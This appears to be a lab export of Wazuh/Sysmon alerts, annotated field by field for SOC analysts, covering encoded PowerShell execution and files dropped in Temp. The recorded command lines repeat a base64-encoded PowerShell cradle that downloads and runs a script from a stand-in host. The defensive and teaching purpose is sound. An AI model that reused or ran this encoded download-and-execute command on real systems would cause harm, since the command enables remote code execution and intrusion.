No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:23.133+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:23.133+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  110
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534423.2046378
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:20.6436679Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285885
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:40:20.629 ProcessGuid: {94294ddc-bdd3-680a-cd0b-000000000e00} ProcessId: 17212 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_ng0zpqlc.nyj.ps1 CreationUtcTime: 2025-04-24 22:40:20.629 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:20.629
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdd3-680a-cd0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  17212
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_ng0zpqlc.nyj.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:40:20.629
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:25.161+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:25.161+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  107
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534425.2049147
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:23.0952982Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285927
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:40:21.885 ProcessGuid: {94294ddc-bdd5-680a-cf0b-000000000e00} ProcessId: 17332 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdd3-680a-cd0b-000000000e00} ParentProcessId: 17212 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:21.885
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdd5-680a-cf0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  17332
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdd3-680a-cd0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  17212
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:25.165+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:25.165+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  111
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534425.2057218
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:23.2871264Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285928
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:40:23.247 ProcessGuid: {94294ddc-bdd5-680a-cf0b-000000000e00} ProcessId: 17332 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_cyvz0ll2.4w1.ps1 CreationUtcTime: 2025-04-24 22:40:23.247 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:23.247
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdd5-680a-cf0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  17332
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_cyvz0ll2.4w1.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:40:23.247
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:40:28.168+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:40:28.168+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  108
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745534428.2059987
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:40:25.5105277Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  285959
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:40:24.293 ProcessGuid: {94294ddc-bdd8-680a-d10b-000000000e00} ProcessId: 4932 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-bdd5-680a-cf0b-000000000e00} ParentProcessId: 17332 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:40:24.293
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-bdd8-680a-d10b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  4932
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-bdd5-680a-cf0b-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  17332
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

